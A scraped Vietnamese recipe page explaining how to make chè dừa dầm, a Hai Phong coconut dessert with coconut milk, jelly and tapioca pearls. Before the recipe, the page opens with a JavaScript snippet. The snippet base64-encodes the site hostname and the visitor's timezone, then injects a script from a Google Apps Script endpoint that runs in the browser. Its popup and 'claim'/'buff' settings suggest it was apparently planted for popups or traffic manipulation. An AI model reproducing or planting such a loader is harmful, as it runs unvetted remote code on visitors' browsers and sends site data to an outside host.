var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

[CHI TIẾT] Cách Làm Chè Dừa Dầm Thơm Ngon, Béo Bùi Hấp Dẫn

Chè dừa dầm là một món ăn nổi tiếng và được yêu thích ở Hải Phòng. Cùng tham khảo cách làm món dừa dầm hấp dẫn này ngay sau đây tại nhà bạn nhé!

1. Nguyên liệu làm dừa dầm bao gồm

Phần nước cốt dừa

+ 1kg cùi dừa (tương đương với 1 – 2 quả dừa)

Phần sữa dừa

+ 500 – 800ml nước cốt dừa

+ 80gr đường (tùy khẩu vị để cân đối thêm)

+ 100ml sữa đặc

+ Muối

+ 50gr bột bắp/bột gạo (không bắt buộc)

Cách làm chè dừa dầm: Nguyên liệu

Phần thạch rau câu dừa

+ 400 – 500ml nước dừa

+ 1 gói bột rau câu con cá dẻo

+ 150ml nước cốt dừa

+ 200gr đường

+ 500ml nước lọc

Phần trân châu dừa của chè dừa dầm:

+ 300gr cùi dừa tươi

+ 600gr bột năng

+ 500ml nước ấm

Lưu ý về nguyên liệu:

– Các nguyên liệu chính đều xuất phát từ dừa tươi nên bạn có thể mua cả quả dừa (số lượng 1 – 2 quả) để vừa lấy nước, vừa lấy cùi, tự rửa sạch, bỏ vỏ, nạo nhỏ cũng như bào sợi thay vì mua từng loại bán sẵn ở ngoài chợ, các cửa hàng.

– Bạn có thể mua loại đóng hộp sẵn ở trong các siêu thị, cửa hàng mà không cần tự làm nước cốt dừa.

Xem thêm: Tổng hợp 3 cách nấu chè mít thơm ngon, mát lạnh, giải nhiệt mùa hè

2. Cách làm chè dừa dầm ngon tại nhà chuẩn vị Hải Phòng

Để làm món dừa dầm bạn cần thực hiện 4 bước chính sau đây.

2.1. Bước 1: Làm nước cốt dừa

Cách làm chè dừa dầm: Thái dừa thành sợi

– Để làm dừa dầm, trước hết bạn phải có nước cốt dừa. Nếu bạn đang có cả miếng cùi dừa tươi to thì phải rửa sạch, cắt sạch hết phần vỏ nâu rồi bào thành hai kiểu là nhỏ vụn và dạng sợi dài. Để tiết kiệm thời gian hơn, bạn có thể tìm mua loại dừa đã nạo thành sợi bán sẵn ở các cửa hàng.

+ Phần cùi dừa sợi sẽ để ăn kèm trực tiếp trong chè dừa dầm, không cần chế biến gì thêm.

+ Phần cùi nhỏ vụn thì bạn cho vào nước ấm, nhào đều, vắt mạnh tay để lấy nước cốt. Hoặc bạn có thể cho phần cùi dừa vào máy xay sinh tố, xay nhuyễn rồi dùng rây lọc phần bã, chỉ giữ lại nước cốt.

Cách làm chè dừa dầm: Lấy nước cốt dừa

2.2. Bước 2: Làm phần sữa dừa

– Cho một phần nước cốt dừa (lấy vừa đủ lượng ăn của gia đình) vào nồi đun cùng đường và một thìa nhỏ muối, để lửa nhỏ cho hỗn hợp sôi lăn tăn. Nếu muốn hỗn hợp có độ sánh, bạn có thể cho thêm một chút bột bắp hoặc bột gạo vào khuấy đều.

– Đun trong khoảng từ 10 – 15 phút thì bạn thêm tiếp sữa đặc vào rồi khuấy cho hòa tan hết tất cả các nguyên liệu, sữa sẽ giúp cho phần nước dừa khi ăn chè dừa dầm của bạn có vị béo ngậy, thơm ngọt.

– Cuối cùng, bạn tắt bếp và bắc hỗn hợp ra ngoài cho nguội, như vậy là đã chuẩn bị xong phần sữa dừa cho món dừa dầm rồi đó.

Cách làm chè dừa dầm: Làm sữa dừa

– Lưu ý: Nếu dùng loại đóng hộp bán sẵn sẽ đặc hơn bình thường, bạn không cần cho thêm bột bắp hay bột gạo để tạo độ sánh nữa.

2.3. Bước 3: Làm thạch rau câu dừa

– Phần thạch rau câu trong chè dừa dầm bao gồm 2 loại là thạch rau câu trắng giả dừa non và thạch rau câu nước dừa tươi.

Làm thạch rau câu trắng giả dừa non

+ Bạn dùng một nửa gói bột rau câu con cá dẻo (khoảng 5gr) trộn với đường rồi đổ nước lọc vào khuấy đều, sau đó bắc lên bếp đun nhỏ lửa.

+ Tiếp theo, bạn cho tiếp một ít nước cốt dừa vừa nấu vừa khuấy liên tục cho đến khi thấy hỗn hợp sôi để tạo ra màu thạch trắng đục, trông giống miếng cùi dừa non. Khu đun bạn nhớ hớt hết lớp bọt để bề mặt thạch không bị rỗ rồi tắt bếp

+ Đổ thạch ra khuôn và để nguội trong ngăn mát tủ lạnh cho thạch đông lại. Khi sử dụng, bạn chỉ cần thái miếng to, độ dày mỏng để trông giống những miếng dừa non là hoàn thành thạch dừa non của chè dừa dầm rồi.

Cách làm chè dừa dầm: Làm thạch rau câu trắng giả dừa non

Làm thạch rau câu nước dừa tươi

+ Bạn dùng một nửa gói bột rau câu con cá dẻo (khoảng 5gr) trộn với đường rồi đổ nước dừa tươi vào để tạo ra độ thanh mát, ngọt vừa miệng.

+ Bạn khuấy đều hỗn hợp, sau đó bắc lên bếp đun nhỏ lửa. Bạn nên giảm bớt lượng đường sử dụng đi một chút để thạch rau câu không bị quá ngọt do đã sử dụng nước dừa tươi. Khi thấy hỗn hợp sôi, bạn dùng thìa hớt sạch phần bọt nổi lên để mặt thạch được mịn, không bị rỗ thành nhiều lỗ nhỏ, sau đó tắt bếp và bắc nồi ra để nguội.

+ Để tiếp tục cách làm chè dừa dầm, bạn chỉ cần đổ hỗn hợp vừa làm vào các loại khay, cho vào tủ lạnh ngăn mát để thạch đông lại là xong. Thạch rau câu dừa tươi bạn có thể đổ vào khuôn nhỏ để tạo hình bông hoa, trái tim, ngôi sao hoặc thái thành hình hạt lựu.

Cách làm chè dừa dầm: Làm thạch rau câu nước dừa tươi

2.4. Bước 4: Chuẩn bị trân châu dừa

– Rửa sạch phần cùi dừa với nước lọc, thái thành những viên hạt lựu nhỏ, kích thước bằng đầu đũa để làm nhân trân châu

– Để tiếp tục làm trân châu cho món chè dừa dầm, bạn cho 600gr bột năng vào một chiếc âu hoặc chậu sạch ráo nước, có thể rây bột một lần để bột được mịn hơn. Tiếp đến, cho nước ấm vào từ từ, nên chú ý điều chỉnh cho phù hợp với tình hình thực tế chứ không đổ hết luôn để đề phòng trường hợp bột quá loãng hoặc không đủ nước tạo độ gắn kết. Bạn nhào bột liên tục cho đến khi cảm thấy bột đã đủ mềm mịn thì dùng màng bọc thực phẩm bao khối bột lại, để bột nghỉ khoảng 30 phút.

– Sau khi nghỉ đủ thời gian, bạn bỏ khối bột ra, lấy một lượng bột nhỏ vừa đủ, lăn tròn rồi dùng ngón tay ấn dẹt xuống để thêm nhân dừa. Tiếp theo, bạn dùng tay gói lớp vỏ bột lại, bọc kín phần nhân dừa rồi vo tròn bột sao cho nhân không lộ ra ngoài, không bị méo mó.

Cách làm chè dừa dầm: Nặn trân châu nhân dừa

– Cuối cùng để hoàn thành trân châu trong món chè dừa dầm, bạn luộc chín trân châu bằng cách đun một nồi nước nóng, đến khi nước sôi hẳn mới thả trân châu vào. Khi trân châu nổi trên mặt nước thì có nghĩa là đã chín. Khi đó bạn vớt trân châu lên rồi thả ngay vào bát nước lạnh để duy trì độ dẻo, các hạt trân châu cũng không dính vào nhau. Đến đây bạn đã có một bát trân châu dừa cực ngon rồi đó. Trân châu dừa có thể ăn với rất nhiều loại chè khác không chỉ riêng chè dừa dầm.

Cách làm chè dừa dầm: Trân châu dừa luộc xong

Đến đây bạn đã hoàn thành quá trình nấu chè dầm dừa rồi. Để thưởng thức bạn chỉ cần trộn đều các phần nguyên liệu đã chế biến, thêm một ít đá và dừa tươi đã nạo thành sợi là có thể cảm nhận ngay hương vị của món dừa dầm ngon, chuẩn vị Hải Phòng rồi. Bạn cũng có thể rắc thêm một chút mè rang hoặc đậu phộng rang giã nhỏ để món chè thêm thơm ngon, béo ngậy.

Cách làm chè dừa dầm: thành phẩm

Với cách làm chè dừa dầm trên đây, chúc bạn thực hiện thành công và có những bữa ăn ngon miệng bên gia đình và bạn bè.

Siêu thị điện máy HC